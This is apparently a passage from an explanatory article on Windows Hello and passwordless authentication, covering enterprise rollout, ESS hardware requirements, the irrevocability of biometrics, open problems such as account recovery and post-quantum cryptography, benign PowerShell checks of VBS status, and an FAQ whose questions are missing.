For consumers, the simplest path is built into Windows: open Settings > Accounts > Sign-in options, create a Windows Hello PIN first, then enroll face or fingerprint if the hardware is present [@ms-whfb]. If Windows only offers PIN, the machine lacks a compatible biometric sensor. On a laptop with an IR camera or certified fingerprint reader, enrollment takes a few minutes and the credential becomes device-bound immediately.

For enterprises, Microsoft now recommends starting with Cloud Trust unless certificate-based authentication is a hard requirement. A practical rollout checklist is short: confirm devices are Entra joined or hybrid joined, deploy Microsoft Entra Kerberos, verify Windows 10 21H2+/Windows 11 clients and Windows Server 2016+ read-write domain controllers in each site, then push Use Windows Hello for Business plus Use cloud trust for on-premises authentication through Intune or Group Policy [@ms-cloud-trust-ga]. That is dramatically lighter than standing up PKI, ADFS, and certificate templates.

ESS deserves its own hardware check. A TPM alone is not enough: ESS depends on Windows 11, VBS-capable hardware, and compatible secure biometric sensors [@ms-ess]. Unsupported systems can still use Hello, but they fall back to the older software-protected biometric path. Hardware inventory determines whether you are getting the modern threat model or merely the old UX.

Note: Start with a pilot group, require a Hello PIN for every enrolled user, and issue at least one backup FIDO2 security key to admins and help-desk staff. The cleanest password migration is additive: enroll Hello first, prove recovery works, then remove password prompts from the highest-value workflows last.

For password migration, avoid a flag day. Keep passwords as break-glass recovery while you move device sign-in, Microsoft 365, VPN, and high-value internal apps onto Hello or passkeys first [@ms-entra-passwordless]. Measure enrollment completion, recovery success, and hardware exceptions. Once those numbers stabilize, tighten Conditional Access so phishing-resistant credentials satisfy MFA and passwords become the fallback of last resort.

After 64 years, the password is finally losing its grip. But the story of Windows Hello is not a triumph -- it is a lesson in the limits of security engineering.

The Limits: What Remains Unsolved

Biometrics fail in a way passwords do not: they are hard to rotate.

You cannot change your face. This single fact defines the deepest unsolved problem in biometric authentication.

Passwords can be rotated. Security keys can be replaced. But you have one face, ten fingerprints, and two irises. If a biometric template is compromised, there is no "reset" button.

A technique for generating revocable biometric templates by applying non-invertible mathematical transformations to the original biometric data. If a transformed template is compromised, a new transformation can be applied to create a fresh template from the same biometric trait. In theory, this solves the irrevocability problem. In practice, the trade-off between non-invertibility and matching accuracy remains unresolved.

The biometric floor

The theoretical limit on biometric authentication error is the Bayes error rate [@jain-biometric] -- the minimum achievable error when the genuine-user and impostor score distributions overlap. Per information theory, the error probability is bounded by Fano's inequality:

$$P_e \geq \frac{H(X|Y) - 1}{\log |X|}$$

where $P_e$ is the probability of error, $H(X|Y)$ is the conditional entropy of identity given the biometric sample, and $|X|$ is the number of possible identities. Current systems achieve a FAR of $10^{-5}$ to $10^{-6}$, but the theoretical minimum [@jain-biometric] -- given perfect sensors and optimal classifiers -- could be orders of magnitude lower. The practical gap is driven by sensor noise, environmental variability, and aging of biometric features.

Five open problems

1. Cross-platform credential portability. Passkeys are currently vendor-locked. An Apple passkey does not transfer to a Google account. The FIDO Alliance published draft CXP/CXF specifications [@fido-cxp] in late 2024 for encrypted credential exchange, but full cross-vendor interoperability is not expected before late 2026.

2. The adversarial ML arms race. Generative AI can create increasingly convincing biometric spoofs -- the Red Bleed attack [@red-bleed] used a VAE to convert RGB photos to NIR facial videos. Discriminative AI tries to detect these spoofs. This is an open-ended arms race with no known endpoint.

3. Account recovery. When all biometric and device-based credentials fail, how does a user recover their account? Most services fall back to email or SMS [@ms-entra-passwordless] -- reintroducing the very phishable factors they were designed to eliminate. Recovery codes are functionally passwords.

Note: Systems that fall back to passwords or SMS for account recovery reintroduce the very vulnerabilities they were designed to eliminate. A truly passwordless system needs passwordless recovery -- and no universal solution exists yet.

4. The quantum threat. Shor's algorithm [@nist-pqc] on a sufficiently large quantum computer would break all ECDSA and RSA authentication -- including every FIDO2 credential in existence. NIST finalized post-quantum standards [@nist-pqc] (ML-DSA, SLH-DSA, ML-KEM) in 2024, but no FIDO2 authenticator ships with post-quantum support as of 2026.

All current FIDO2/WebAuthn authentication uses ECDSA P-256, which provides 128-bit classical security. Breaking a single credential requires approximately $2^{128}$ operations -- far beyond any existing computer.

Shor's algorithm changes this equation. A cryptographically relevant quantum computer could factor the elliptic curve discrete logarithm problem in polynomial time, breaking ECDSA entirely. No such computer exists today, but the "harvest now, decrypt later" threat means adversaries may be collecting signed assertions now to verify forged credentials later.

NIST finalized its first post-quantum cryptography standards in 2024 [@nist-pqc]: ML-DSA (formerly CRYSTALS-Dilithium) for signatures, ML-KEM (formerly CRYSTALS-Kyber) for key encapsulation, and SLH-DSA (formerly SPHINCS+) for hash-based signatures. The FIDO Alliance and W3C are exploring hybrid signature schemes that combine classical ECDSA with post-quantum algorithms, but no timeline for standardization has been published.

5. The ESS hardware gap. ESS requires specific secure sensors and VBS-capable CPUs [@ms-ess]. Many enterprise PCs -- particularly those shipped without an ESS-certified built-in biometric sensor, including many AMD-based and older Intel-based machines -- lack ESS capability. On these devices, Windows Hello falls back to the pre-ESS security model, leaving them vulnerable to attacks like Faceplant.

6. Accessibility and inclusion. Biometric authentication creates barriers for people with facial differences, missing fingers, or conditions that affect biometric stability. A passwordless future must ensure that non-biometric alternatives (PINs, hardware keys) remain first-class options, not afterthoughts. Behavioral biometrics -- keystroke dynamics, gait analysis, continuous session verification -- represent an emerging parallel path that may expand authentication options beyond traditional biometric modalities.

Open PowerShell as administrator and run:

Get-CimInstance -Namespace root/Microsoft/Windows/DeviceGuard -ClassName Win32_DeviceGuard | Select-Object VirtualizationBasedSecurityStatus

A value of 2 means VBS is running. Then check the biometric service:

Get-WinEvent -LogName Microsoft-Windows-Biometrics/Operational -MaxEvents 10 | Format-List

Look for events indicating ESS-protected biometric operations. If your device lacks ESS, consider disabling biometric sign-in on sensitive accounts and using FIDO2 hardware keys instead.

Key idea: Biometric traits are permanent and finite. Unlike passwords, they cannot be changed if compromised. This irrevocability is the deepest unsolved challenge in passwordless authentication -- and no amount of better sensors or smarter algorithms can change the fact that you have one face, ten fingerprints, and two irises.

The theoretically ideal system would combine zero-knowledge biometric verification, post-quantum cryptographic authentication, hardware-attested revocable credentials, and cross-platform portability. None of this exists yet.

The password's 64-year reign is ending, but its replacement is still under construction. Every generation of authentication solved one problem and revealed a deeper one. The question is not whether passwordless authentication will win -- it is whether we can build it before the attackers catch up.

Frequently Asked Questions

No. Biometric data never leaves the device. During enrollment, your face or fingerprint template is stored locally, protected by the operating system (and by VBS on ESS-enabled devices). Only a public key is registered with the identity provider (Azure AD / Entra ID) [@ms-whfb]. Microsoft's servers never receive, store, or process your biometric data. Standard photos cannot. Windows Hello uses near-infrared cameras [@ms-biometric-reqs] with anti-spoofing algorithms that distinguish between live faces and flat images. However, researchers have demonstrated advanced attacks: CVE-2021-34466 [@cyberark-bypass] used a custom USB device emulating an IR camera, and the Red Bleed attack [@red-bleed] used a custom NIR-emitting LCD display. Both have been patched, but the arms race continues. No -- it is more secure. A Windows Hello PIN is device-bound [@ms-whfb]: it unlocks a TPM-stored private key on that specific hardware. A stolen PIN is useless without physical access to the device. A password, by contrast, works from any device on earth and can be phished, reused, or leaked in a breach. Consumer Windows Hello [@ms-whfb] ties authentication to a personal Microsoft account. Windows Hello for Business integrates with Azure AD / Entra ID with enterprise management capabilities: conditional access policies, Intune deployment, multiple trust models (cloud, key, certificate), and group policy controls. They share the same biometric and TPM technology but have different management and security models. No. Passkeys build on Hello's foundation. Windows Hello acts as the platform authenticator for FIDO2 passkeys [@fido-how] on Windows -- your biometric gesture unlocks the passkey stored in the TPM. Passkeys extend Hello's model to cross-platform and cross-service authentication via the WebAuthn standard [@webauthn-3]. With device-bound credentials (traditional Windows Hello), you re-enroll on the new device using your Microsoft or organizational account. With synced passkeys, credentials restore from your credential manager -- iCloud Keychain [@apple-passkeys-security] for Apple, Google Password Manager [@google-passkeys] for Android/Chrome. Registering a FIDO2 hardware security key [@fido-specs] as a backup authenticator is strongly recommended. Not indefinitely. The asymmetric cryptography underlying Hello and FIDO2 (ECDSA P-256) is theoretically vulnerable [@nist-pqc] to quantum computers running Shor's algorithm. No quantum computer can break it today, and the timeline for cryptographically relevant quantum computers remains uncertain. NIST finalized post-quantum cryptography standards in 2024, but no FIDO2 authenticator ships with post-quantum support yet. Migration planning should begin now.